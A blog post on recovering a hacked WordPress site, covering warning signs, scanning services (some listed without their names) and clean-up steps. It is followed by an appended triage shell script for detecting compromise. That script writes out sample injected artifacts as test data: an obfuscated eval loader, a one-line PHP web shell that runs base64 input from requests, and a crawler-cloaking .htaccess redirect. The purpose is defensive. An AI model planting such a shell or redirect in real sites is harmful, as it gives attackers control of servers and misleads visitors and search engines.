Tighten WordPress Security



Last weekend, my blog was hacked

My guess is that some bloggers are as ignorant as I was of what to do. In fact, if I weren’t fortunate enough to get some help, I would’ve been doomed. So I thought I’d share what I did, along with tips for what to do if your blog ever gets hacked.

Fixing a hacked website is a fairly heavy technical task. Most bloggers are not webmasters and are not really technical people: they bought a web hosting account, set up WordPress with a one-click installer, and started blogging.

Often I find that the emails and posts along the lines of “help me, my site was hacked, what do I do?” don’t get much help. There’s a reason for this: the people asking are usually not in a position to fix the problem themselves.

This article walks through the steps involved in cleaning a hacked WordPress website: identifying the source of the compromise, locating the infection, cleaning the code, and regaining control of your WordPress website or blog.

But before we begin:

Is Your Hacked WordPress Website Really Hacked?

Before you start the analysis and clean-up process, confirm that your WordPress site has actually been hacked. A lot of reports turn out to be false alarms: a panicked WordPress administrator can mistake a spam comment, or a site that is simply broken, for a hacked one.

What are the compromised websites used for?

Hosting malware

URL redirect

Hosting phishing, spam pages, pornography

Other content or activity

Sending backlinks to the attacker's website

How to Find Out If Your Website Is Hacked

Below are the common signs to look out for on your WordPress website.

Displaying popups that you didn’t implement

Displaying odd text in your footer or in the “View Source”

Links to other sites, or auto-linking of keywords you never created links for

Seeing obfuscated / encoded text in plugins

Website redirecting (immediately or after a short length of time) to another URL

Any unusual activity, or spikes in traffic or bandwidth usage

Other indicators of a hack include:

Website is blacklisted by Google, Bing, etc..

Host has disabled your website

Website has been flagged for distributing malware

Readers complaining that their desktop antivirus is flagging your site

Being contacted because your website is being used to attack other sites

Noticing behavior you did not authorize (e.g., creation of new users)

You can visibly see that your site has been hacked when you open it in the browser


7 Best Tools to Identify Hacked Sites

Google Webmaster Tools Email Alerts

One of its most useful features is the email notification Google sends when it detects bad activity, such as a hack, on your site.

Browser Security Scanner

Scans the web browser on your own computer for security vulnerabilities, including outdated software and browser plugins such as Java, Adobe Flash, Adobe Reader and Microsoft Silverlight. This checks the machine you administer the site from rather than the site itself; an outdated browser on the administrator's PC is one common way for site credentials to be stolen.

Google Safe Browsing diagnostics

(google.com/safebrowsing/diagnostic?site=http://YOURDOMAIN) See how Google sees your site.

StopBadware Clearinghouse


It scans your WordPress website from every angle for signs of a successful attack, giving a complete analysis of potential issues. This deep scanner performs a thorough analysis to check for signs of infection, backdoors, trojans, suspicious code and other security issues.


Scans your website for malware, trojans, backdoors, worms and viruses, and checks whether your website is blacklisted by Google and other blacklist authorities.


Runs a complete scan to automatically remove known security threats and backdoor scripts, and upgrades vulnerable versions of TimThumb scripts.


Scans for the Heartbleed vulnerability, included in the free scan for all users. Scans core files, themes and plugins against the versions in the WordPress.org repository to check their integrity, so you can verify that your source files are unmodified.


A free online scanning service for viruses, malware and URLs. Files are checked with more than 40 antivirus engines.


A malware scanner that also runs its own searches for malicious or suspicious iframes, scripts, downloads, redirections and other items.

Cloaked Link Checker

Checks whether your site is cloaked to Googlebot, contains spam links or suspicious redirects, or otherwise appears to be hacked. It runs multiple checks, from spam-link and hidden-text detection up to sophisticated cloaking.

With the signs and tools above you should be able to confirm whether your site has been hacked.

Before we get to the clean-up steps, have a look at the infographic below on keeping WordPress secure: a cheat sheet of security tips every WordPress user should follow.

The important steps to take if your WordPress site is hacked, and how to clean it up:

Make a Backup

Identify How WordPress Got Hacked

Audit Logs and Web Server and FTP Server Logs

Unused and Outdated WordPress Plugins and Themes

Old WordPress Code and Installations

WordPress Users and Roles

Shared Hosting Providers

.htaccess Files

Check Other Points of Entry

Finding the WordPress Infection & Malicious Code

Check Which Files Were Modified in the Last Few Days

Check All HTML Files

Search for Infection Text

Reset your website admin password with phpMyAdmin

Update applications, extensions, plugins and themes

Remove your website from blacklists

Get help from Google

Google has an 8-step program for un-hacking your site, which includes basics like identifying the vulnerability that was used to compromise your site, as well as how to request a review so Google will remove the dreaded “this site has been compromised” message from its search results.

For more information and all the details on what to do if you’ve been hacked, see the Help for Hacked Sites section of Google’s Webmaster Tools.
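The triage steps listed above (files modified in the last few days, searching for infection text, .htaccess files, and auditing web server logs), as an added shell example that is not part of the original post. It builds its own throwaway WordPress-like directory and a constructed access log so it runs offline: the injected files, the example.com redirect target and the RFC 5737 client addresses are all made up for the demonstration, and the paths are assumptions. On a real host you would point the same functions at the site's document root and its access log instead.

```shell
#!/bin/sh
# Added example, not from the original post: offline triage helpers for the
# "files modified in the last few days", "search for infection text",
# ".htaccess files" and "audit logs" steps. All input is constructed here;
# on a real host point the functions at the document root and access log.

# Build a small WordPress-like tree (constructed) with three injected
# artifacts so the checks below have something to find. Prints its path.
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-content/uploads" "$site/wp-content/themes/twentyten"
    # Clean files, last touched long ago
    cat > "$site/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp');
EOF
    printf '<?php\nadd_theme_support("post-thumbnails");\n' \
        > "$site/wp-content/themes/twentyten/functions.php"
    touch -t 202001010000 "$site/wp-config.php" \
        "$site/wp-content/themes/twentyten/functions.php"
    # Injected: obfuscated loader prepended to index.php (payload is a placeholder)
    cat > "$site/index.php" <<'EOF'
<?php eval(gzinflate(base64_decode('placeholder-not-a-real-payload'))); ?>
<?php define('WP_USE_THEMES', true); require './wp-blog-header.php';
EOF
    # Injected: web shell dropped into uploads/, where WordPress only writes media
    cat > "$site/wp-content/uploads/cache.php" <<'EOF'
<?php if (isset($_REQUEST['c'])) { @eval(base64_decode($_REQUEST['c'])); } ?>
EOF
    # Injected: .htaccess that redirects search-engine crawlers only (cloaking)
    cat > "$site/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://example.com/go.php [R=302,L]
EOF
    echo "$site"
}

# Files changed within the last $2 days under $1: the first thing to diff
# against a known-good backup.
recently_modified() {
    find "$1" -type f -mtime -"$2" | sort
}

# PHP files using the obfuscation primitives injected code leans on.
# Some legitimate plugins use these too, so read every hit before deleting.
find_suspicious_php() {
    grep -rlE --include='*.php' \
        -e 'eval\(' -e 'base64_decode\(' -e 'gzinflate\(' -e 'str_rot13\(' \
        -e 'preg_replace\(.*/e' -e '\$_(GET|POST|REQUEST|COOKIE)\[' \
        "$1" | sort
}

# PHP under uploads/ is almost always a dropped shell.
php_in_uploads() {
    find "$1/wp-content/uploads" -type f -name '*.php' | sort
}

# .htaccess rules that send visitors off-site or prepend PHP to every request.
check_htaccess() {
    find "$1" -name .htaccess -exec grep -HnE \
        'RewriteRule.*https?://|auto_prepend_file|php_value' {} +
}

# Constructed access log in combined format (RFC 5737 test addresses).
make_sample_log() {
    log=$(mktemp)
    cat > "$log" <<'EOF'
198.51.100.7 - - [10/Mar/2015:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1542 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2015:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1542 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2015:10:00:05 +0000] "GET /2015/03/hello-world/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2015:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2015:10:01:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 440 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2015:10:01:09 +0000] "GET /wp-content/uploads/cache.php?c=cGhwaW5mbygpOw== HTTP/1.1" 200 12 "-" "curl/7.40.0"
EOF
    echo "$log"
}

# POSTs to the login and XML-RPC endpoints per client IP: many from one
# address is credential stuffing; a 302 after a run of 200s is the success.
login_posts_per_ip() {
    awk '$6 == "\"POST" && $7 ~ /^\/(wp-login|xmlrpc)\.php/ { n[$1]++ }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# Requests for PHP under uploads/: someone driving a dropped shell.
uploads_php_hits() {
    awk '$7 ~ /^\/wp-content\/uploads\/.*\.php/ { print $1, $6, $7 }' "$1"
}
```

Source the file into a shell (`. ./triage.sh`, an assumed filename) and call, for example, `find_suspicious_php "$(make_sample_site)"` or `login_posts_per_ip /var/log/apache2/access.log`. Treat the grep hits as leads, not verdicts: plenty of legitimate plugins call base64_decode, so compare each flagged file against a fresh copy from WordPress.org before deleting anything (for core files, wp-cli's `wp core verify-checksums` does that comparison for you).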

If you’ve ever had a site hacked or helped someone else resolve their hack issues, please share what worked best for you. Now is the time for “the fish was this big” stories.



